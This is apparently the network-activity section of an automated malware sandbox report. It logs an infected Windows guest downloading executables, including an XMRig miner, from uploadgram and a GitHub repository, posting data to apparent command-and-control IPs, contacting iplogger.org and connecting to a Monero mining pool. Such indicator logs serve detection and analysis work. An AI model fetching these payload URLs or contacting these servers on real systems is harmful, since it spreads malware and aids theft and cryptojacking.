Network Analysis
IP Address | Status | Action |
---|---|---|
103.89.90.61 | Active | Moloch |
117.18.232.200 | Active | Moloch |
148.251.234.83 | Active | Moloch |
164.124.101.2 | Active | Moloch |
176.113.115.146 | Active | Moloch |
176.9.247.226 | Active | Moloch |
185.191.229.101 | Active | Moloch |
185.199.110.133 | Active | Moloch |
193.56.146.177 | Active | Moloch |
195.54.170.157 | Active | Moloch |
20.200.245.247 | Active | Moloch |
23.206.175.225 | Active | Moloch |
45.159.248.173 | Active | Moloch |
51.15.55.100 | Active | Moloch |
62.204.41.144 | Active | Moloch |
TCP Requests
Source | Destination | Hostname |
---|---|---|
192.168.56.103:49210 | 103.89.90.61:34589 | |
192.168.56.103:49231 | 117.18.232.200:443 | |
192.168.56.103:49232 | 117.18.232.200:443 | |
192.168.56.103:49233 | 117.18.232.200:443 | |
192.168.56.103:49234 | 117.18.232.200:443 | |
192.168.56.103:49235 | 117.18.232.200:443 | |
192.168.56.103:49236 | 117.18.232.200:443 | |
192.168.56.103:49237 | 117.18.232.200:443 | |
192.168.56.103:49238 | 117.18.232.200:443 | |
192.168.56.103:49239 | 117.18.232.200:443 | |
192.168.56.103:49240 | 117.18.232.200:443 | |
192.168.56.103:49241 | 117.18.232.200:443 | |
192.168.56.103:49242 | 117.18.232.200:443 | |
192.168.56.103:49286 | 117.18.232.200:80 | |
192.168.56.103:49171 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49172 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49173 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49174 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49177 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49178 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49180 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49181 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49182 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49183 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49185 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49186 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49187 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49188 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49189 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49191 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49192 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49193 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49200 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49201 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49207 | 148.251.234.83:443 | iplogger.org |
192.168.56.103:49209 | 176.113.115.146:9582 | |
192.168.56.103:49248 | 176.9.247.226:443 | dl.uploadgram.me |
192.168.56.103:49224 | 185.191.229.101:40915 | insttaller.com |
192.168.56.103:49259 | 185.199.110.133:443 | raw.githubusercontent.com |
192.168.56.103:49289 | 185.199.110.133:443 | raw.githubusercontent.com |
192.168.56.103:49214 | 193.56.146.177:80 | |
192.168.56.103:49215 | 195.54.170.157:16525 | |
192.168.56.103:49258 | 20.200.245.247:443 | github.com |
192.168.56.103:49287 | 20.200.245.247:443 | github.com |
192.168.56.103:49250 | 23.206.175.225:80 | apps.identrust.com |
192.168.56.103:49195 | 45.159.248.173:80 | |
192.168.56.103:49295 | 51.15.55.100:14433 | xmr-eu2.nanopool.org |
UDP Requests
Source | Destination |
---|---|
192.168.56.103:49347 | 164.124.101.2:53 |
192.168.56.103:50092 | 164.124.101.2:53 |
192.168.56.103:51084 | 164.124.101.2:53 |
192.168.56.103:51935 | 164.124.101.2:53 |
192.168.56.103:51958 | 164.124.101.2:53 |
192.168.56.103:53064 | 164.124.101.2:53 |
192.168.56.103:57573 | 164.124.101.2:53 |
192.168.56.103:60117 | 164.124.101.2:53 |
192.168.56.103:60556 | 164.124.101.2:53 |
192.168.56.103:60693 | 164.124.101.2:53 |
192.168.56.103:60880 | 164.124.101.2:53 |
192.168.56.103:61603 | 164.124.101.2:53 |
192.168.56.103:63183 | 164.124.101.2:53 |
192.168.56.103:63462 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:138 | 192.168.56.255:138 |
192.168.56.103:49152 | 239.255.255.250:3702 |
192.168.56.103:51087 | 239.255.255.250:1900 |
52.231.114.183:123 | 192.168.56.103:123 |
8.8.8.8:53 | 192.168.56.103:63183 |

HTTP Requests
GET 200 https://dl.uploadgram.me/62f0d0bc546feh?raw

Request:
GET /62f0d0bc546feh?raw HTTP/1.1
Host: dl.uploadgram.me
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 13 Aug 2022 11:36:00 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 73216
Connection: keep-alive
cache-control: max-age=31556926
content-transfer-encoding: Binary
accept-ranges: bytes
content-disposition: attachment; filename="MainModule.exe"; filename*=utf-8''MainModule.exe
x-frame-options: SAMEORIGIN
x-robots-tag: noindex

GET 302 https://github.com/BardBax/xyi/blob/main/Task24Watch.exe?raw=true

Request:
GET /BardBax/xyi/blob/main/Task24Watch.exe?raw=true HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 13 Aug 2022 11:36:08 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
Location: https://github.com/BardBax/xyi/raw/main/Task24Watch.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Set-Cookie: _gh_sess=rbafQxxL8VBFpGqHxJcanDz7pCCVzxIaM1i%2B2S6UNMd7zjswxtfs%2BrmlQ%2BRbfuhw0R%2FdwxsTewhPmBum9bjBWRxOq7BfkOn9%2BT%2Fq090YeIaN9SL7%2Fd1GKd9bkXdaq%2B%2F2JaUILPWcQZhs1%2F%2B4gHEi6Zubw6o06f5rdvzURAAlXO%2FMH3Slz51Uasvz9QknOutlFuXcIVhlLYKRPBt8NTMoCtnmJ0Q4TsZ0sMyOCRih0qtR5A6In2Ik3R4sC2ZNSJIKr6hn79GHtIje6draqXWo%2Fw%3D%3D--0vCDDVgnBQg5f83o--l8gcBRHHjOT%2FVs338A%2BFOg%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
Set-Cookie: _octo=GH1.1.996876656.1660390568; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:08 GMT; Secure; SameSite=Lax
Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:08 GMT; HttpOnly; Secure; SameSite=Lax
Content-Length: 0
X-GitHub-Request-Id: C06A:086B:24562:1A198F:62F78CA8

GET 302 https://github.com/BardBax/xyi/raw/main/Task24Watch.exe

Request:
GET /BardBax/xyi/raw/main/Task24Watch.exe HTTP/1.1
Host: github.com

Response:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 13 Aug 2022 11:36:09 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C06A:086B:24563:1A1993:62F78CA8

GET 200 https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe

Request:
GET /BardBax/xyi/main/Task24Watch.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 974336
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "34a8dafa0dc2efc62641dd80e6906414ad939d96a310e5f87d632c065a0ea68e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E332:2A13:58202:154793:62F77209
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 11:36:09 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450021-ICN
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1660390569.159945,VS0,VE217
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: c3666546a999e576ac680a43fa2707a539e469ec
Expires: Sat, 13 Aug 2022 11:41:09 GMT
Source-Age: 0

GET 302 https://github.com/BardBax/xyi/blob/main/xmrig.exe?raw=true

Request:
GET /BardBax/xyi/blob/main/xmrig.exe?raw=true HTTP/1.1
Host: github.com
Connection: Keep-Alive

Response:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 13 Aug 2022 11:36:28 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
Location: https://github.com/BardBax/xyi/raw/main/xmrig.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Set-Cookie: _gh_sess=KWIplv5YW5hTuPCfELapKIyhjjDnSOulmRg%2FTYZL%2B%2BWEmcQDL4OWzi9yrUPCcG30Mv1ZC9ldbr7G7nJCJRkFhljVJkFoSoj09dtdlKgQ7lLLr7r8wZKDD3WN2kbbXRWq%2BgStlb8y%2FagPyDz7VvEW%2B1iHUYtOGhh7%2BtRzEWSr%2F3GlOMfEegz4KtcGxUcaa6STSlD7XpRKo%2FFFNBiYw90AmSleejGJIup7Imag7pSj%2F3MTd3mPT%2FhBMQTpctP8sbV9qJ6%2F3%2FKBCPOufj6RsCNR8w%3D%3D--Asr2NKr4xwz8tkzX--EZD2gwKyl6tvmA8ElC3P%2BQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
Set-Cookie: _octo=GH1.1.1638893445.1660390588; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:28 GMT; Secure; SameSite=Lax
Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:28 GMT; HttpOnly; Secure; SameSite=Lax
Content-Length: 0
X-GitHub-Request-Id: C087:5243:522D03:810D37:62F78CBC

GET 302 https://github.com/BardBax/xyi/raw/main/xmrig.exe

Request:
GET /BardBax/xyi/raw/main/xmrig.exe HTTP/1.1
Host: github.com

Response:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Sat, 13 Aug 2022 11:36:29 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
permissions-policy: interest-cohort=()
Access-Control-Allow-Origin: https://render.githubusercontent.com
Location: https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C087:5243:522D10:810D49:62F78CBC

GET 200 https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe

Request:
GET /BardBax/xyi/main/xmrig.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 5389312
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "96407b957cce48a97dbf27172a9a863c3d65745ff03a14d4d01ddcf52480ca56"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 829C:0B03:7365:5F03A:62F7721B
Accept-Ranges: bytes
Date: Sat, 13 Aug 2022 11:36:29 GMT
Via: 1.1 varnish
X-Served-By: cache-icn1450048-ICN
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1660390589.183516,VS0,VE278
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: ae9652b066a442fbe482e824c072de2d32da07ba
Expires: Sat, 13 Aug 2022 11:41:29 GMT
Source-Age: 0

GET 200 http://45.159.248.173/1571

Request:
GET /1571 HTTP/1.1
Host: 45.159.248.173

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 13 Aug 2022 11:35:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

GET 200 http://45.159.248.173/3137953174.zip

Request:
GET /3137953174.zip HTTP/1.1
Host: 45.159.248.173
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 13 Aug 2022 11:35:31 GMT
Content-Type: application/zip
Content-Length: 3642574
Last-Modified: Mon, 04 Jul 2022 10:49:28 GMT
Connection: keep-alive
ETag: "62c2c5b8-3794ce"
Accept-Ranges: bytes

POST 200 http://193.56.146.177/

Request:
POST / HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: mozzzzzzzzzzz
Host: 193.56.146.177
Content-Length: 95
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 13 Aug 2022 11:35:41 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5339
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
X-DNS-Prefetch-Control: off
Expect-CT: max-age=0
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Origin-Agent-Cluster: ?1
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
X-XSS-Protection: 0
ETag: W/"14db-8p2h3NzQKmBAAjk8oDOYrKzutxE"

POST 200 http://45.159.248.173/

Request:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3715594587533448
Host: 45.159.248.173
Content-Length: 49430
Connection: Keep-Alive
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 13 Aug 2022 11:35:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

GET 200 http://apps.identrust.com/roots/dstrootcax3.p7c

Request:
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

Response:
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT
ETag: "37d-5e1e6e25c9800"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Sat, 13 Aug 2022 12:36:00 GMT
Date: Sat, 13 Aug 2022 11:36:00 GMT
Connection: keep-alive

GET 200 http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml

Request:
GET /IE9CompatViewList.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: ie9cvlist.ie.microsoft.com
If-Modified-Since: Fri, 16 Oct 2020 17:54:09 GMT
If-None-Match: 0x8D871FC7BDF491D
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Content-Encoding: gzip
Age: 8023
Cache-Control: max-age=21600
Content-MD5: p9g4jsuZO6TaLMVAI9ujVg==
Content-Type: text/xml
Date: Sat, 13 Aug 2022 11:36:28 GMT
Etag: 0x8D9521D2D2DF1EC
Last-Modified: Wed, 28 Jul 2021 23:12:31 GMT
Server: ECAcc (tka/897A)
Vary: Accept-Encoding
X-Cache: HIT
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: ead25f45-c01e-00bf-31f6-aef974000000
x-ms-version: 2009-09-19
Content-Length: 13702

ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49258 20.200.245.247:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | 1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a |
TLS 1.2 192.168.56.103:49259 185.199.110.133:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2 |
TLS 1.2 192.168.56.103:49287 20.200.245.247:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | 1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a |
TLS 1.2 192.168.56.103:49248 176.9.247.226:443 | C=US, O=Let's Encrypt, CN=R3 | CN=uploadgram.me | 0b:46:9f:79:7b:ee:c3:6f:15:5b:37:09:45:b9:6b:65:a1:d8:ee:a8 |
TLS 1.2 192.168.56.103:49289 185.199.110.133:443 | C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2 |
TLS 1.2 192.168.56.103:49295 51.15.55.100:14433 | C=US, O=CloudFlare, Inc., OU=CloudFlare Origin SSL Certificate Authority, L=San Francisco, ST=California | O=CloudFlare, Inc., OU=CloudFlare Origin CA, CN=CloudFlare Origin Certificate | a4:ae:d4:ca:11:61:1f:57:07:59:2e:03:62:44:cf:80:e3:76:5d:42 |
Snort Alerts
No Snort Alerts